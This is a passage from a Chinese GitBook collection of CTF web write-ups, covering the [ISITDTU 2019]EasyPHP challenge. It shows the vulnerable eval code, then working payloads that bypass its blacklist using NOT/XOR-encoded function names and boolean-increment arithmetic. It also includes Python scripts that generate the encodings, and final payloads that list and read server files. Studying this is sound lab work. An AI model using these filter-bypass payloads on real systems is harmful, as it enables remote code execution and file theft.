🤤
BUUOJwp
  • README
  • SQL注入
    • [BSidesCF 2019]Sequel
    • [RCTF2015]EasySQL
    • [RootersCTF2019]babyWeb
    • [SUCTF 2018]MultiSQL
    • October 2019 Twice SQL Injection
    • [Black Watch 入群题]Web
    • [网鼎杯2018]Unfinish
    • [NCTF2019]SQLi
    • [CISCN2019 华北赛区 Day1 Web5]CyberPunk
    • [WUSTCTF2020]颜值成绩查询
    • [强网杯 2019]随便注
    • [b01lers2020]Life on Mars
    • [CISCN2019 华北赛区 Day2 Web1]Hack World
    • [SUCTF 2019]EasySQL
    • [GXYCTF2019]BabySQli
    • [GYCTF2020]Ezsqli
    • [极客大挑战 2019]EasySQL
    • [极客大挑战 2019]LoveSQL
    • [极客大挑战 2019]BabySQL
    • [极客大挑战 2019]HardSQL
    • [极客大挑战 2019]FinalSQL
    • [RoarCTF 2019]Online Proxy
    • [BJDCTF2020]Easy MD5
    • [BJDCTF 2nd]简单注入
    • [网鼎杯 2018]Comment
    • [SWPU2019]Web1
    • [GYCTF2020]Blacklist
    • [SWPU2019]Web4
    • [HarekazeCTF2019]Sqlite Voting
    • [XDCTF 2015]filemanager
    • [FBCTF2019]Products Manager
    • [PwnThyBytes 2019]Baby_SQL
    • [Zer0pts2020]phpNantokaAdmin
    • [NPUCTF2020]ezlogin
  • 命令执行/代码执行
    • [De1CTF 2019]Giftbox
    • Wallbreaker_Easy
    • [GXYCTF2019]禁止套娃
    • [CISCN 2019 初赛]Love Math
    • [NESTCTF 2019]Love Math 2
    • [ISITDTU 2019]EasyPHP
    • [红明谷CTF 2021]write_shell
    • 未完成[RoarCTF 2019]Easy Calc
    • [极客大挑战 2019]RCE ME
    • EasyBypass
    • [FBCTF2019]RCEService
    • [ACTF2020 新生赛]Exec
    • [HITCON 2017]SSRFme
    • [GXYCTF2019]Ping Ping Ping
    • [SUCTF 2018]GetShell
  • XXE
    • [NCTF2019]Fake XML cookbook
    • [NCTF2019]True XML cookbook
    • [CSAWQual 2019]Web_Unagi
    • [BSidesCF 2019]SVGMagic
    • [GoogleCTF2019 Quals]Bnv
  • SSRF
    • [网鼎杯 2020 玄武组]SSRFMe
  • XSS
    • [CISCN2019 华东北赛区]Web2
    • [GWCTF 2019]mypassword
  • SSTI
    • PHP
      • [CISCN2019 华东南赛区]Web11
      • [BJDCTF2020]The mystery of ip
      • [BJDCTF2020]Cookie is so stable
    • Python
      • [GWCTF 2019]你的名字
      • [pasecactf_2019]flask_ssti
      • [FBCTF2019]Event
      • [RootersCTF2019]I_<3_Flask
      • [CSCCTF 2019 Qual]FlaskLight
      • [GYCTF2020]FlaskApp
      • [WesternCTF2018]shrine
      • [护网杯 2018]easy_tornado
  • 文件上传
    • [HarekazeCTF2019]Avatar Uploader 1
    • [SUCTF 2019]CheckIn
    • [WUSTCTF2020]CV Maker
    • [MRCTF2020]你传你🐎呢
    • [GXYCTF2019]BabyUpload
    • [极客大挑战 2019]Upload
    • [ACTF2020 新生赛]Upload
    • [XNUCA2019Qualifier]EasyPHP
    • [羊城杯2020]easyphp
    • [SUCTF 2019]EasyWeb
  • PHP
    • Laravel
      • 未完成[CISCN2019 总决赛 Day1 Web4]Laravel1
    • PHP特性
      • [RCTF 2019]Nextphp
      • [WMCTF2020]Make PHP Great Again
      • [HarekazeCTF2019]encode_and_encode
      • [安洵杯 2019]easy_web
      • [Zer0pts2020]Can you guess it?
      • [WUSTCTF2020]朴实无华
      • [BJDCTF2020]Mark loves cat
      • [MRCTF2020]Ez_bypass
      • [GWCTF 2019]枯燥的抽奖
      • [MRCTF2020]Ezaudit
      • [BJDCTF2020]EzPHP
      • [NPUCTF2020]ReadlezPHP
      • [BSidesCF 2020]Had a bad day
      • [GWCTF 2019]我有一个数据库
      • [ACTF2020 新生赛]Include
      • [HCTF 2018]WarmUp
      • [SUCTF 2018]annonymous
      • [极客大挑战 2020]Roamphp1 Welcome
      • [网鼎杯 2020 半决赛]AliceWebsite
      • [ACTF2020 新生赛]BackupFile
      • [极客大挑战 2019]BuyFlag
      • [羊城杯 2020]Blackcat
      • [羊城杯 2020]Easyphp2
      • [羊城杯 2020]EasySer
    • PHP反序列化
      • [MRCTF2020]Ezpop_Revenge
      • [HarekazeCTF2019]Easy Notes
      • bestphp's revenge
      • [SUCTF 2019]Upload Labs 2
      • [SWPUCTF2018] SimplePHP
      • [CISCN2019 华北赛区 Day1 Web1]Dropbox
      • [0CTF 2016]piapiapia
      • [安洵杯 2019]easy_serialize_php
      • [GYCTF2020]Easyphp
      • [极客大挑战 2019]PHP
      • [网鼎杯 2020 青龙组]AreUSerialz
      • [BJDCTF2020]ZJCTF,不过如此
      • [EIS 2019]EzPOP
      • [2020 新春红包题]1
      • [MRCTF2020]Ezpop
      • [ZJCTF 2019]NiZhuanSiWei
    • ThinkPHP
      • [安洵杯 2019]iamthinking
      • [GYCTF2020]EasyThinking
      • [BJDCTF 2nd]old-hack
      • [RoarCTF 2019]Simple Upload
    • PHP综合
      • [网鼎杯 2020 总决赛]Game Exp
      • [HITCON 2017]Baby^h Master PHP
      • [HFCTF2020]BabyUpload
      • [NPUCTF2020]ezinclude
      • [MRCTF2020]套娃
      • [BUUCTF 2018]Online Tool
      • [网鼎杯 2020 朱雀组]Nmap
      • [网鼎杯 2020 朱雀组]phpweb
      • [网鼎杯 2018]Fakebook
      • [强网杯 2019] UPLOAD
      • [CISCN2019 总决赛 Day2 Web1]Easyweb
      • [GKCTF 2021]easycms
      • [GXYCTF2019]BabysqliV3.0
      • [N1CTF 2018]eating_cms
      • [安洵杯 2019]不是文件上传
      • [极客大挑战 2020]Greatphp
      • [极客大挑战 2020]Roamphp2-Myblog
      • [蓝帽杯 2021]One Pointer PHP
      • [BJDCTF2020]EzPHP
      • [CISCN2021 Quals]upload
  • Python
    • 逻辑漏洞
      • [DDCTF 2019]homebrew event loop
      • [CISCN2019 华北赛区 Day1 Web2]ikun
    • Flask
      • [HCTF 2018]Hideandseek
      • [SWPU2019]Web3
      • [watevrCTF-2019]Supercalc
      • [HCTF 2018]admin
      • [De1CTF 2019]SSRF Me
      • [CISCN2019 总决赛 Day1 Web3]Flask Message Board(*)
      • [CISCN2019 华东南赛区]Web4
      • [CISCN2019 华东南赛区]Double Secret
      • [网鼎杯 2020 白虎组]PicDown
      • [PASECA2019]honey_shop
      • [HFCTF 2021 Final]easyflask
    • 反序列化
      • [watevrCTF-2019]Pickle Store
  • Java
    • [网鼎杯 2020 朱雀组]Think Java
    • [NPUCTF2020]web🐕
    • [网鼎杯 2020 青龙组]filejava
    • [RoarCTF 2019]Easy Java
  • JavaScript
    • [GYCTF2020]Ez_Express
    • [网鼎杯 2020 青龙组]notes
    • [NPUCTF2020]验证🐎
    • [GYCTF2020]Node Game
    • [HITCON 2016]Leaking
    • [HFCTF2020]JustEscape
    • [FireshellCTF2020]ScreenShooter
    • [HFCTF2020]EasyLogin
  • 未分类
    • Unicode安全性
      • [SUCTF 2019]Pythonginx
      • [ASIS 2019]Unicorn shop
    • HTTP问题
      • [极客大挑战 2019]Secret File
      • [极客大挑战 2019]Http
      • [MRCTF2020]PYWebsite
      • [BSidesCF 2019]Kookie
      • [BSidesCF 2020]Hurdles
      • [watevrCTF-2019]Cookie Store
    • [b01lers2020]Space Noodles
    • [BSidesCF 2020]Cards
    • [BSidesCF 2019]Mixer
    • [BSidesCF 2019]Pick Tac Toe
    • [BSidesCF 2019]Futurella
    • [RootersCTF2019]ImgXweb
    • [CSAWQual 2016]i_got_id
    • [Windows][HITCON 2019]Buggy_Net
    • [极客大挑战 2019]Knife
    • [极客大挑战 2019]Havefun
    • [GXYCTF2019]StrongestMind
    • [b01lers2020]Welcome to Earth
    • [FireshellCTF2020]Caas
    • [BJDCTF2020]EasySearch
    • [SCTF2019]Flag Shop
    • [强网杯 2019]高明的黑客
    • virink_2019_files_share
由 GitBook 提供支持
在本页
  • [ISITDTU 2019]EasyPHP
  • 考点
  • wp
  • 小结
在GitHub上编辑
  1. 命令执行/代码执行

[ISITDTU 2019]EasyPHP

[ISITDTU 2019]EasyPHP

考点

  • 无字符代码执行

wp

<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>

代码执行,最后一个if不允许使用的字符超过12个

然后输入黑名单如下

ASCII值0-32
数字0-9 ASCII是48-57
'"`$&.,|[{_defgops ASCII对应39,34,96,36,38,46,44,124,91,123,95,100,101,102,103,111,112,115

到这里想到的绕过方式是异或和取反,然后在返回头看一下PHP版本是7.3,那就可以用函数执行的特性结合取反

phpinfo取反为%8F%97%8F%96%91%99%90,PHP7函数执行(~%8F%97%8F%96%91%99%90)();,长度为10

看到disable_functions

但是有字符使用的限制,所以还是要考虑其他方式。以前p牛说过无字符getshell可以用自增、位运算和取反,再偷一波陆队的思路。

现在可以考虑一下自增。PHP在获取HTTP参数时默认是字符串,然后可以用!进行布尔类型转换,再用@忽略notice输出,就可以把!!@a转化为数字1,然后再用chr()转换拼接就可以构造任意函数,但是需要用.拼接

// phpinfo();
(chr((!!@a%2b!!@a%2b!!@a)**(!!@a%2b!!@a%2b!!@a)*(!!@a%2b!!@a%2b!!@a%2b!!@a)%2b(!!@a%2b!!@a%2b!!@a%2b!!@a)).chr((!!@a%2b!!@a%2b!!@a)**(!!@a%2b!!@a%2b!!@a)*(!!@a%2b!!@a%2b!!@a%2b!!@a)-(!!@a%2b!!@a%2b!!@a%2b!!@a)).chr((!!@a%2b!!@a%2b!!@a)**(!!@a%2b!!@a%2b!!@a)*(!!@a%2b!!@a%2b!!@a%2b!!@a)%2b(!!@a%2b!!@a%2b!!@a%2b!!@a)).chr((!!@a%2b!!@a%2b!!@a)**(!!@a%2b!!@a%2b!!@a)*(!!@a%2b!!@a%2b!!@a%2b!!@a)-(!!@a%2b!!@a%2b!!@a)).chr((!!@a%2b!!@a%2b!!@a)**(!!@a%2b!!@a%2b!!@a)*(!!@a%2b!!@a%2b!!@a%2b!!@a)%2b(!!@a%2b!!@a)).chr((!!@a%2b!!@a%2b!!@a)**(!!@a%2b!!@a%2b!!@a)*(!!@a%2b!!@a%2b!!@a%2b!!@a)-(!!@a%2b!!@a%2b!!@a%2b!!@a%2b!!@a%2b!!@a)).chr((!!@a%2b!!@a%2b!!@a)**(!!@a%2b!!@a%2b!!@a)*(!!@a%2b!!@a%2b!!@a%2b!!@a)%2b(!!@a%2b!!@a%2b!!@a)))();

使用异或,如果用爆破的方法就会很慢,偷一波陆队的思路。先确定自己想执行的语句,比如phpinfo,然后定一个参考字符串,让phpinfo和它异或,就可以得到想要的输入,如果得到的结果不符合要求,再微调参考字符串

p:%8f^%ff
h:%97^%ff
i:%96^%ff
n:%91^%ff
f:%99^%ff
o:%90^%ff

结果是%8f%97%8f%96%91%99%90^%ff%ff%ff%ff%ff%ff%ff,脚本如下:

target = "phpinfo"
standard = 0xff

dicts = {}
for i in target:
    dicts[i] = hex(ord(i)^standard).replace('0x','%')

res = ''
for i in target:
    res = res+dicts[i]
print(res+'^'+"%ff"*len(target))
print(len(set(res+'^'+"%ff"*len(target))))

但是这里有个疑问,%21^%4f的结果是n,但是在测试的时候却不对

加上引号就可以了

用数字也是同样的道理,一开始一直报错,但是把数字用trim转换一下就可以了。然后用自增找到数字

p:A^1
h:Y^1
i:X^1
n:Z^4
f:W^1
o:Z^5

结果是AYAXZWZ^1111415

(trim((!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a)*((!!%40a%2b!!%40a)**(!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a)%2b(!!%40a%2b!!%40a)**(!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a)%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a)*((!!%40a%2b!!%40a)**(!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a)%2b(!!%40a%2b!!%40a)**(!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a)-(!!%40a%2b!!%40a)**(!!%40a%2b!!%40a%2b!!%40a%2b!!%40a%2b!!%40a)-!!%40a-!!%40a-!!%40a))%5e%40AYAXZWZ)();

这里如果要求字符种类最少,可以考虑使用%ff的方式,先生成语句,再去尝试找可以替换的字符。如下,共用了16个字符

print_r(scandir('.'))
(%8f%8d%96%91%8b%a0%8d^%ff%ff%ff%ff%ff%ff%ff)((%8c%9c%9e%91%9b%96%8d^%ff%ff%ff%ff%ff%ff%ff)((%d1^%ff)));

所以要找到可以替换的,即在内部可以互相异或出来的,目标代码用到的字符为['n', 'p', 'c', 's', 'i', 'a', 't', 'd', 'r', '_', '.'],写个脚本找一下

s=['n', 'p', 'c', 's', 'i', 'a', 't',  'd', 'r', '_', '.']
for i in s:
    for j in s:
        for k in s:
            if (chr(ord(i)^ord(j)^ord(k)) in s):
                xorRes = i+'^'+j+'^'+k
                if len(set(xorRes)) == 4:
                    print(chr(ord(i)^ord(j)^ord(k))+'='+xorRes)

得到的结果对应如下

p %8f^%ff
r %8d^%ff
i %96^%ff    %9c^%ff^%9b^%91
n %91^%ff 
t %8b^%ff
_ %a0^%ff
s %8c^%ff    %9c^%ff^%9b^%8b
c %9c^%ff
a %9e^%ff    %8d^%ff^%9c^%8f
d %9b^%ff
. %d0^%ff

找一下就可以找到,原则先找必须存在的字符,比如.和_,那么a,d,0也必须存在,那么r就必须存在,同样的,对于字符c和d,在生成的URL编码中也有,所以c和d也必须存在,如果换掉,相当于没有做异或,对于n和i而言,哪个都可以,后续不牵扯到6和1,然后看t和s,他们也是哪个都可以,他们URL编码中的b和c都已经存在,最后是a和p,明显a含有的字符更多,要保留p

a=r^c^p
s=c^d^t 
i=c^d^n

最后结果

p %8f^%ff
r %8d^%ff
i %9c^%ff^%9b^%91
n %91^%ff 
t %8b^%ff
_ %a0^%ff
s %9c^%ff^%9b^%8b
c %9c^%ff
a %8d^%ff^%9c^%8f
d %9b^%ff
. %d1^%ff

print_r(scandir('.'))

(%8f%8d%9c%91%8b%a0%8d^%ff%ff%ff%ff%ff%ff%ff^%ff%ff%9b%ff%ff%ff%ff^%ff%ff%91%ff%ff%ff%ff)((%9c%9c%8d%91%9b%9c%8d^%ff%ff%ff%ff%ff%ff%ff^%9b%ff%9c%ff%ff%9b%ff^%8b%ff%8f%ff%ff%91%ff)((%d1^%ff)));

readfile(end(scandir('.')))

((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

小结

上一页[NESTCTF 2019]Love Math 2下一页[红明谷CTF 2021]write_shell

最后更新于3年前

一些不包含数字和字母的webshell
无字母数字webshell之提高篇